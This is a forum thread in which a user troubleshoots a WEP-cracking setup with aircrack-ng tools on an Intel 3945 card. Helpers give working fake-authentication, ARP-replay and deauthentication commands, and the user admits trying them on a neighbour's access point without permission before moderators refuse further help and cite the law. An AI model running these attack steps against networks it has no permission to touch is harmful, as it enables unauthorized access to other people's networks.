Hi All,
I use the ipwraw-ng 2.0.0 drivers. My channel is the same as my AP (iwconfig wifi0 channel 6). I set up my airodump-ng, works fine. When I try to fakeauth with the AP it says:
20:39:25 Waiting for beacon frame (BSSID: 00:18:39:xx:xx:xx)
20:39:25 Sending Authentication Request
20:39:25 Authentication successful
20:39:25 Sending Association Request
20:39:30 Sending Authentication Request
20:39:32 Sending Authentication Request
20:39:34 Sending Authentication Request
20:39:36 Sending Authentication Request

Attack was unsuccessful.
The authentication is always succesful but it can't make an association.
I use this command:
./aireplay-ng -1 0 -b macoftheAP -h mymac wifi0

There is also something weird I notice
When I do ifconfig -a to show my own mac adres it says by wifi0:
00-19-D2-xx-xx-xx-00-00-00-00-00-00-00-00-00-00
So it show my mac adres and then a lot of 0's. Don't know if that can be the problem.
I unload the original drivers by doing: modprobe -r ipw3945
I hope that's enough, I'm currently trying it on ubuntu because I got the same with backtrack but no difference.
In lsmod i don't see anything from ipw3945 anymore.
Maybe should I change my mac ? Is it necessary ?

Thanks in advance,
silentkiller

Please update to the newest Developmental version of the aircrang-ng suite. This solves most peoples problems.

Aircracks developmental version.
Code:
svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
cd aircrack-ng
gmake SQLITE=true
gmake SQLITE=true install

Hi man,
Thx for your reply, i installed the latest version and ...:
23:06:02 Waiting for beacon frame (BSSID: 00:18:39:xx:xx:xx)

23:06:02 Sending Authentication Request
23:06:02 Authentication successful
23:06:02 Sending Association Request [ACK]

23:06:07 Sending Authentication Request

23:06:09 Sending Authentication Request

23:06:11 Sending Authentication Request
.
.
.
.
.

23:06:38 Sending Authentication Request
Attack was unsuccessful. Possible reasons:

It didn't help.
I already tryed the network of the neighbours (just for testing) but it did the same ..

aireplay-ng -1 0 -b macoftheAP -h mymac wifi0

should be ath0 not wifi0


Watch my videos in the tutorial section...especially the one thats stickied..and since you have an Atheros chipped card, follow my video to the "T". ;)

As I said, I use the intel 3945abg chipset with the ipwraw drivers, so it is wifi0 ;)

As I said, I use the intel 3945abg chipset with the ipwraw drivers, so it is wifi0 ;)


OOOps!..Sorry!! I just saw the wifi0 and assumed Atheros. :o

But it couldn't hurt to watch the videos anyways.

If you watched them and followed...what are ALL of your commands from start to this error?? :confused::confused:

hehe, i followed your videos already but i'll explain what i'll do (nice video's btw, will reply in the thread when I got my first WEP cracked ;))
so: i boot up, the:
modprobe -r ipw3945 (eth1 disappears)
modprobe ipwraw (wifi0 and ath0 show up)
then: ./airodump wifi0
I copy the bssid and write down the channel
iwconfig wifi0 channel 11 (it's a linksys router)
./airodump-ng -c 11 --bssid macap -w blabla wifi0
other window:
./aireplay-ng -1 0 -a macap -h mymac wifi0

And the: the error ;)

hehe, i followed your videos already but i'll explain what i'll do (nice video's btw, will reply in the thread when I got my first WEP cracked ;))
so: i boot up, the:
modprobe -r ipw3945 (eth1 disappears)
modprobe ipwraw (wifi0 and ath0 show up)
then: ./airodump wifi0
I copy the bssid and write down the channel
iwconfig wifi0 channel 11 (it's a linksys router)
./airodump-ng -c 11 --bssid macap -w blabla wifi0
other window:
./aireplay-ng -1 0 -a macap -h mymac wifi0

And the: the error ;)

Well, your commands appear to be correct. :)

How far away are you? Close? Far? 30 foot away??:confused: Etc...

BTW...

Have you tried to add -e networksnamehere in your command....

aireplay-ng -1 0 -a macap -h mymac wifi0

and make it..

aireplay-ng -1 0 -e essidhere -a macap -h mymac wifi0

from the neighbours, i would't know
from my own router: it's almost near me, in windows i have a full signal bar so i think it should be something else.
I ordered a D-LINK DWL-G122 usb stick, maybe I can get it working with that, tough, it should work with the intel chipset :)

from the neighbours, i would't know
from my own router: it's almost near me, in windows i have a full signal bar so i think it should be something else.
I ordered a D-LINK DWL-G122 usb stick, maybe I can get it working with that, tough, it should work with the intel chipset :)

You failed to setup your card correctly thus it will not work.

What does the wiki (http://backtrack.offensive-security.com/index.php?title=HCL:Wireless#IPW3945_2) state:

* Notice: After starting airodump-ng only run one command at a time.
If you do not your system may hang or freeze.

ifconfig wifi0 down
#Change to AP BSSID
nano /sys/class/net/wifi0/device/bssid
# Channel of AP
nano /sys/class/net/wifi0/device/channel
# Change from 108 to 2
nano /sys/class/net/wifi0/device/rate
ifconfig wifi0 up
airodump-ng rtap0
#wifi0 is used for all other commands.

Thanks for the info man, it helped :):
10:11:02 Sending Authentication Request [ACK]
10:11:02 Authentication successful
10:11:02 Sending Association Request [ACK]
10:11:02 Association successful :-)

So that's nice
Next command:
./aireplay-ng -3 -b 00:90:96:xx:xx:xx -h 00-19-D2-xx-xx-xx -e SANTIS50-4CFFA8 wifi0
But then the data packets don't start raising:
Read 373 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
(I also tried without the -e but doesn't help)

So what I did before:
ifconfig wifi0 down
nano /sys/class/net/wifi0/device/bssid => I replace the 00:00.. by the mac of the ap the i'm attacking

nano /sys/class/net/wifi0/device/channel => I change this to the channel of the AP i'm attacking

nano /sys/class/net/wifi0/device/rate => I change this from 108 to 2
Then: ifconfig wifi0 up

What I do notice: when i use this command: ifconfig wifi0 down, i still can see the wifi0 in the iwconfig, is this normal ?
If I want, I also can use airodump-ng with wifi0, even when it is down (or should be down)

For airodump I used: .airodump-ng -e blablabla rtap0 (and the AP showed up)

Is there a client connected? and if there is not how long are you waiting for a arp request?

euh, I don't think there is a client connected because I see no data in airodump-ng. I also tried aireplay-ng with a --deauth and it says it should work better with the mac of the client. I searched the forum but can't find a tutorial for cracking wep with a client connected. I don't think there is a client connected, but if there is, how can I find his mac to deauth him ?

So its like your neighbors AP and your not sure if there is any other clients connected?

Normaly he's not at home in the weekends so i don't think he's connected. But even when I do aireplay-ng --deauth 0 -a 00:90:96:4C:FF:xx wifi0 it doesn't get an arp request

I don't suppose you are aware that cracking AP's and stealing wifi is a crime in almost every country.

I'm just trying to get my own ap cracked, offcourse I do know that, but if it doesn't work on my ap, i try it on another ap (neigbours). Then I know it's my fault and not the fault of the AP. I will not crack the password, just testing if the injecting works, but it doesn't work on both (mine and neighbours)

Alright well maybe some other moron will help you but I do not feel comfortable helping you conduct your u833r l33t h4x0r illegal business. In fact I bet I know where this thread is going.

BTW just for anyones info: As soon as you associate and authenticate with a access point you are BREAKING the LAW!!!

I don't think you get it:
I'm making a work for my last year in school about wireless networks. I read WEP was easy to crack and I want to show it to my teachers that I was able to crack my own network. That's all.
But if you don't believe me, ok, no problem, I'm not going to make a fight about this ..

I get it just fine. You admitted to using our distro for illegal activities and I do not want to help you.

Ok then, no problem if you don't believe me

It may shock you to know that people often misrepresent them selves on the internet.

man, if you don't believe me, no problem then, but just drop it then
I really do know what you mean, I know the people that you mean but I'm not like that and if you don't believe me, no problem, but just drop it then.
Adn btw, why should I try to crack the network of the neighbours, I can't do anything with it :s

euh, I don't think there is a client connected because I see no data in airodump-ng. I also tried aireplay-ng with a --deauth and it says it should work better with the mac of the client. I searched the forum but can't find a tutorial for cracking wep with a client connected. I don't think there is a client connected, but if there is, how can I find his mac to deauth him ?

Normaly he's not at home in the weekends so i don't think he's connected. But even when I do aireplay-ng --deauth 0 -a 00:90:96:4C:FF:xx wifi0 it doesn't get an arp request

Perhaps you didn't read the forum rules.........

By registering with these forums you agree to be bound by the rules....
Particularly these 3 spring to mind:


We do not condone any illegal activity at all.
Do not post about breaking into networks that do not belong to you and for which you have no permissions.
Posts like - "Oooh! look!! I've cracked my neighbours wireless AP" or "How do I hack a network!?" are not needed here, thanks.

Just gotta add this guys response, via a PM to me.

Apparently, because he couldn't do this attack successfully on his own network, trying it out on a another neighbours network is fine, because it's just a test to confirm whether the original problem lays within his own network!?:rolleyes::confused:

He then goes on to say that this is akin to trying a suspect vga card in another pc, to confirm whether it's the vga card or the pc at fault!?

I pointed out that in this analogy, it would involve breaking in to someones house, while they are out, and testing your vga card in their pc with neither their knowledge or express consent.
But I don't think he gets it..........:rolleyes: